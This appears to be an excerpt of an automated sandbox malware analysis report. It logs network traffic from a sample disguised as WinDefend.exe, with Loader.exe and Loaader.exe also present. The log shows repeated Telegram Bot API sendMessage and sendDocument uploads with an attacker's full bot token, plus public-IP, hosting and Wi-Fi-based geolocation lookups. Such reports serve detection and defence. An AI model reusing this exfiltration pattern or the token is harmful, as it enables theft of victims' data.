Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 347Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 258Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="59450b1b-8cf8-4a9d-b290-7eb34f5ec1fc"Host: api.telegram.orgContent-Length: 987Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="6fce76d9-0adf-4b0e-98c6-2800b20f329e"Host: api.telegram.orgContent-Length: 3312Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="41d44b8f-7b24-42e1-8a76-e8f6b80a1170"Host: api.telegram.orgContent-Length: 313542Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 251Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 347Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 258Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="7c02f42e-db9e-45df-912d-bade5ff55dc0"Host: api.telegram.orgContent-Length: 52064Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="ba951992-57b2-4f8b-a418-cf89eba89d53"Host: api.telegram.orgContent-Length: 4170Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="32b1706f-6542-42b1-8fab-42ac39adac32"Host: api.telegram.orgContent-Length: 130574Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 349Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 251Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 257Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="7ab0b122-2d0a-454c-9cd6-27f316b345b7"Host: api.telegram.orgContent-Length: 2251Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="7f5e282c-36db-45f4-92a4-ce4ac209ceb7"Host: api.telegram.orgContent-Length: 52104Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="64f452c2-59cc-48cb-9907-2fbcdbdb6917"Host: api.telegram.orgContent-Length: 30376Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 349Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 230Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 257Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="b6ac085b-b0e5-487e-b9f7-fafc3df76db9"Host: api.telegram.orgContent-Length: 1531Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="c4b3654f-6b19-4d85-9f54-8ddd111b40e6"Host: api.telegram.orgContent-Length: 10675Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="bf45d7d5-cdaa-4bf3-96de-598d21fd0bcb"Host: api.telegram.orgContent-Length: 79559Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 349Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 229Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 258Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="6317a6f4-f9a6-4639-b805-73f0b2836928"Host: api.telegram.orgContent-Length: 4359Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="adbbb210-efe3-4ce1-a332-776add664964"Host: api.telegram.orgContent-Length: 8060Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="a792a574-c062-4494-a9a0-0321e9c28bf8"Host: api.telegram.orgContent-Length: 332197Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 348Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 226Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="e00c1ca2-72ac-4840-9ced-6bd7ad730a7f"Host: api.telegram.orgContent-Length: 12617Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 257Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 347Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 240Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="7f7063b9-486e-4359-8822-8a223dc91761"Host: api.telegram.orgContent-Length: 11429Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="01cdfa1e-89f4-4d27-a799-97624c5d11c9"Host: api.telegram.orgContent-Length: 1464Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="dba1e0a7-3a5a-42f1-ae51-01bbdb95286f"Host: api.telegram.orgContent-Length: 26930Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 257Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 347Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="275f3aec-ca8f-4ace-88d4-794afa455f8a"Host: api.telegram.orgContent-Length: 21235Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 246Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="cdf1892d-44ac-4fbd-bfb5-688fedbe445c"Host: api.telegram.orgContent-Length: 1821Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 349Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="b7e61f92-a196-4212-b075-a2088c6c54ad"Host: api.telegram.orgContent-Length: 2326Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 349Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 246Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="02751a0b-43a0-4228-b250-5c660c3e58ca"Host: api.telegram.orgContent-Length: 1553Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="04dab5fe-5091-494a-add1-e55b3a57bacb"Host: api.telegram.orgContent-Length: 59057Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="1871a4ec-2cfd-4f86-a94b-62a3a4f2a9f1"Host: api.telegram.orgContent-Length: 44784Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 349Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 204Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 258Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="9fdd44d1-095a-4d58-b4c3-0c52decf4d65"Host: api.telegram.orgContent-Length: 4887Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="9efd76a0-7ba4-4af0-a6aa-28899ddd0f85"Host: api.telegram.orgContent-Length: 672Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="004aaa9b-31de-413b-be07-2538580bcce4"Host: api.telegram.orgContent-Length: 319894Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 348Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 208Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 258Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="e0df5263-6b9a-466f-a257-99d5fc14a0f2"Host: api.telegram.orgContent-Length: 1229Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="578eee22-8a09-41b4-89b2-60ecaf03bffa"Host: api.telegram.orgContent-Length: 934Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="593636b9-6ab3-4b39-b64c-0c606f68b8ae"Host: api.telegram.orgContent-Length: 262934Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 347Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 192Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 257Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="abd7000b-0fa8-45e1-b558-b29acd39828d"Host: api.telegram.orgContent-Length: 1404Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="f8451159-dc44-4a7a-aa25-3a00ea09d03e"Host: api.telegram.orgContent-Length: 600Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="7e71501f-f78e-4e8b-b204-7cf7606d7793"Host: api.telegram.orgContent-Length: 42190Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 347Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 196Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 258Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="1f289f73-e1c8-4805-a304-af7c9691fe3d"Host: api.telegram.orgContent-Length: 1548Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="d80e067b-6bdb-4762-b126-95d60933b193"Host: api.telegram.orgContent-Length: 893Expect: 100-continue
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.com
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View ASN Name: TUT-ASUS TUT-ASUS
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown DNS query: name: api64.ipify.org
Source: unknown DNS query: name: icanhazip.com
Source: unknown DNS query: name: ip-api.com
Source: unknown HTTPS traffic detected: 104.21.44.66:443 -> 192.168.2.5:61173 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: api64.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: api64.ipify.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic DNS traffic detected: DNS query: icanhazip.com
Source: global traffic DNS traffic detected: DNS query: 81.189.14.0.in-addr.arpa
Source: global traffic DNS traffic detected: DNS query: ip-api.com
Source: global traffic DNS traffic detected: DNS query: api.mylnikov.org
Source: unknown HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 493Expect: 100-continueConnection: Keep-Alive
Source: Loaader.exe, 00000015.00000002.3282228143.000000000372A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.mylnikov.org
Source: WinDefend.exe, 00000004.00000002.3288846438.0000000003542000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003314000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000327B000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000354F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000332D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000326D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003345000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003299000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000034A3000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000323F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003535000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000327D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000325D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000350A000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003517000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000346F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 
00000016.00000002.3288493213.0000000003451000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000031B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: WinDefend.exe, 0000001F.00000002.3288810827.0000000002F7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org0
Source: WinDefend.exe, 00000004.00000002.3288846438.0000000003542000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003314000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000327B000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000354F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000332D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000326D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003345000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003299000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000034A3000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000323F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003535000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000327D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000325D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000350A000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003517000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000346F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 
00000016.00000002.3288493213.0000000003451000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000031B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.orgd
Source: WinDefend.exe, 00000004.00000002.3430651015.000000000B845000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000030.00000002.2300634583.0000013E8BBD4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft
Source: 77EC63BDA74BD0D0E0426DC8F80085060.21.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: Loader.exe, 00000014.00000002.2747981173.000000001B58A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab/
Source: Loaader.exe, 00000015.00000002.3532252741.000000001BBB4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab6
Source: Loaader.exe, 00000015.00000002.3248245047.00000000012B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en89n
Source: Loader.exe, 00000014.00000002.2521881734.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/ene089
Source: Loaader.exe, 00000015.00000002.3282228143.00000000032B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://icanhazip.com
Source: Loaader.exe, 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.00000000032B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://icanhazip.com/
Source: Loaader.exe, 00000015.00000002.3282228143.00000000031FB000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003199000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com
Source: Loaader.exe, 00000015.00000002.3282228143.00000000031FB000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003199000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: Loader.exe, 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://james.newtonking.com/projects/json
Source: powershell.exe, 00000019.00000002.2776917070.0000015CD05B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2776917070.0000015CD06F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2740239857.0000019143C44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2740239857.0000019143D87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.3023734848.0000029A19F09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.3023734848.0000029A19DC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.3028687529.0000013E9DB9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.3028687529.0000013E9DA57000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000030.00000002.2306321177.0000013E8DC08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
